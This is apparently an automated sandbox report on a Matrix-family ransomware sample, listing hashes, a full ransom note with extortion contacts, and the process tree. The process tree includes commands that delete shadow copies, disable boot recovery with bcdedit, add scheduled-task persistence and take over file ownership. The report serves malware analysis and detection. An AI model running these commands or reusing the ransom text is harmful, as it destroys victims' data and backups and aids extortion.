Analysis

  • max time kernel
    149s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    13-02-2024 05:15

General

  • Target

    FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

  • SSDEEP

    24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#CORE_README#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. 
If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 250A73C848E74C58\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. 
We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. 
\f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. 
R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. 
S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 250A73C848E74C58\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 CDrF6jFT\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWp8CEAX.exe"
      2⤵
      PID:3052
    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWp8CEAX.exe
      "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWp8CEAX.exe" -n
      2⤵
      • Executes dropped EXE
      PID:2700
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Amb2lQhd.txt"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:664
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:560
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yYAzuyxd.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Windows\SysWOW64\wscript.exe
        wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yYAzuyxd.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2468
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\BkJK9MMO.bat" /sc minute /mo 5 /RL HIGHEST /F
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2160
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\BkJK9MMO.bat" /sc minute /mo 5 /RL HIGHEST /F
            5⤵
            • Creates scheduled task(s)
            PID:2496
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
          4⤵
          PID:3656
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Run /I /tn DSHCA
            5⤵
            PID:2136
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\goa4rOzf.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2764
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\goa4rOzf.bmp" /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:784
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
        3⤵
        PID:2652
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        3⤵
        PID:3008
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\h1JAkYNr.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2264
      • C:\Windows\SysWOW64\attrib.exe
        attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
        3⤵
        • Views/modifies file attributes
        PID:976
      • C:\Windows\SysWOW64\cacls.exe
        cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
        3⤵
        PID:2300
      • C:\Windows\SysWOW64\takeown.exe
        takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
        3⤵
        • Modifies file permissions
        PID:1788
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c cIAicoUd.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
        3⤵
        • Loads dropped DLL
        PID:2440
        • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\cIAicoUd.exe
          cIAicoUd.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2784
          • C:\Users\Admin\AppData\Local\Temp\cIAicoUd64.exe
            cIAicoUd.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
            5⤵
            • Drops file in Drivers directory
            • Sets service image path in registry
            • Executes dropped EXE
            • Enumerates connected drives
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: LoadsDriver
            • Suspicious use of AdjustPrivilegeToken
            PID:3380
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {7392793C-6BFE-42DC-BE69-ECA911E4658B} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]
    1⤵
    PID:3052
    • C:\Windows\SYSTEM32\cmd.exe
      C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\BkJK9MMO.bat"
      2⤵
      PID:3184
      • C:\Windows\system32\vssadmin.exe
        vssadmin Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:3076
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic SHADOWCOPY DELETE
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3316
        • C:\Windows\system32\vssadmin.exe
          "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
          4⤵
          • Interacts with shadow copies
          PID:2852
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2496
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Delete /TN DSHCA /F
        3⤵
        PID:3420
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2892
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1232

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#CORE_README#.rtf

    Filesize

    8KB

    MD5

    6fbf6ad4ea5d6e03bc22e928f049a490

    SHA1

    1289802177286d07db398199827080ed69f3cfb7

    SHA256

    88830da0b8297443b3deb5e8956497019f6de89dbb42b0c6bdaaa111a727f77d

    SHA512

    ba8d8656165a5327bf5a066785957324b0eb96f28bc3c2c3824c1d8230792143a02d95cee6dff0c819ae2027cd51d01641c8aeb261a726fe4323d65b0c1516bf

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Amb2lQhd.txt

    Filesize

    14B

    MD5

    c74dacdd9331a6698efffe81ff66ac08

    SHA1

    79e8ce4bb5cc2436e95fad4a74a31aee7aa63043

    SHA256

    82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c

    SHA512

    24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWp8CEAX.exe

    Filesize

    1.2MB

    MD5

    907636b28d162f7110b067a8178fa38c

    SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

    SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

    SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\cIAicoUd.exe

    Filesize

    181KB

    MD5

    2f5b509929165fc13ceab9393c3b911d

    SHA1

    b016316132a6a277c5d8a4d7f3d6e2c769984052

    SHA256

    0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

    SHA512

    c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_250A73C848E74C58.txt

    Filesize

    54KB

    MD5

    e7f188677e8633f67a46c1c89a1dbe72

    SHA1

    b4e2c62ee56a5ac9fb2667b081bc8223d68fb450

    SHA256

    b46aed5cfebfd676433d0197fdbc0c6b6c0ab118ec21676153a4a242ea6b8303

    SHA512

    89ea7d06e341291ef38a98d46337d57283d8f7e7d9cc199e3a3fbfd61a4cc28df823049e75cac26c492f2c2a99b4d46bff56ba9b8dd2e0b2d4b61c899a7226ab

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\h1JAkYNr.bat

    Filesize

    246B

    MD5

    2d85adf113db0ac9214aff722a60b6d2

    SHA1

    0181fa1a8d3abd5be3f4326e0abad138e9541f58

    SHA256

    9bb51e333f60a076236c2e444549963020b737b09773049cbe738c3251cdd4be

    SHA512

    6100b035460475edcf2e4b9b2b16b013b3898a72af0605764eb672266151a39c8559e7cc04dc0cf445417399e80769dcaa8b43dc264317fa85ac2720922d6f9c

  • C:\Users\Admin\AppData\Roaming\BkJK9MMO.bat

    Filesize

    415B

    MD5

    96508db6b3b23d103267541d9895aa70

    SHA1

    21666fd18ea5ac56f3d5efb11306376ed0e8ab85

    SHA256

    eb5844b4e1122b48776548b85e34e7283c4e226d10e8904f963fa5f2bdb14e5b

    SHA512

    a7f6237bbfc42b5b8304fc3770058380c8624168ded1e5459de099c7c5b1463ba971b6fbcd83f688e6170ce6a949e7200b0b78c5433926a26d48a85e4c195a02

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6NEXW3IM1ARCHDGCVIH8.temp

    Filesize

    7KB

    MD5

    5c5575ab5f758dcd5aaf42254630e785

    SHA1

    c151fdae808affcd3100a5df938d3daeebe26b28

    SHA256

    10cacd6037deff03c8afff527d70bae8fb04cb2ea647f354abf0ad93d62a7b43

    SHA512

    e5891b61cb073c7f0cbef10fb9323543e3799450fb243c0b7eba9f7a1518d20000d0dffeaa37519634841fb429c616fc10e1a5c2f5aec006eaa51a72b2606897

  • C:\Users\Admin\AppData\Roaming\yYAzuyxd.vbs

    Filesize

    260B

    MD5

    96c135025ee40d98f537ac76b3a4ca90

    SHA1

    acc32ca642fcf5ac2cccf671a3cc917f5d0c2ecd

    SHA256

    93e7aa86b6164018a888f353c5ddd8c7833bee7bff1d17384c67c89b23851560

    SHA512

    2617d2da935c89905389b26a643a7742e661ae56c7a2e15a4350904033b8a3d30021e1ce57da84e7b2767ffae0c5edfb58ccf37b2491fa415e9416bcb42424a7

  • \Users\Admin\AppData\Local\Temp\cIAicoUd64.exe

    Filesize

    221KB

    MD5

    3026bc2448763d5a9862d864b97288ff

    SHA1

    7d93a18713ece2e7b93e453739ffd7ad0c646e9e

    SHA256

    7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

    SHA512

    d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

  • memory/560-13-0x00000000027F0000-0x0000000002830000-memory.dmp

    Filesize

    256KB

  • memory/560-15-0x00000000027F0000-0x0000000002830000-memory.dmp

    Filesize

    256KB

  • memory/560-14-0x00000000027F0000-0x0000000002830000-memory.dmp

    Filesize

    256KB

  • memory/560-12-0x0000000073FF0000-0x000000007459B000-memory.dmp

    Filesize

    5.7MB

  • memory/560-17-0x0000000073FF0000-0x000000007459B000-memory.dmp

    Filesize

    5.7MB

  • memory/560-11-0x0000000073FF0000-0x000000007459B000-memory.dmp

    Filesize

    5.7MB

  • memory/2184-16-0x0000000000400000-0x000000000053B000-memory.dmp

    Filesize

    1.2MB

  • memory/2184-7079-0x0000000000400000-0x000000000053B000-memory.dmp

    Filesize

    1.2MB

  • memory/2184-14480-0x0000000000400000-0x000000000053B000-memory.dmp

    Filesize

    1.2MB

  • memory/2184-14633-0x0000000000400000-0x000000000053B000-memory.dmp

    Filesize

    1.2MB

  • memory/2440-1674-0x0000000000120000-0x0000000000197000-memory.dmp

    Filesize

    476KB

  • memory/2440-14634-0x0000000000120000-0x0000000000197000-memory.dmp

    Filesize

    476KB

  • memory/2700-8-0x0000000000400000-0x000000000053B000-memory.dmp

    Filesize

    1.2MB

  • memory/2784-1733-0x0000000000400000-0x0000000000477000-memory.dmp

    Filesize

    476KB

  • memory/3316-14640-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

    Filesize

    2.9MB

  • memory/3316-14641-0x0000000002290000-0x0000000002298000-memory.dmp

    Filesize

    32KB

  • memory/3316-14642-0x000007FEF4CD0000-0x000007FEF566D000-memory.dmp

    Filesize

    9.6MB

  • memory/3316-14643-0x0000000002A60000-0x0000000002AE0000-memory.dmp

    Filesize

    512KB

  • memory/3316-14644-0x000007FEF4CD0000-0x000007FEF566D000-memory.dmp

    Filesize

    9.6MB

  • memory/3316-14645-0x0000000002A60000-0x0000000002AE0000-memory.dmp

    Filesize

    512KB

  • memory/3316-14646-0x0000000002A60000-0x0000000002AE0000-memory.dmp

    Filesize

    512KB

  • memory/3316-14647-0x0000000002A60000-0x0000000002AE0000-memory.dmp

    Filesize

    512KB

  • memory/3316-14649-0x000007FEF4CD0000-0x000007FEF566D000-memory.dmp

    Filesize

    9.6MB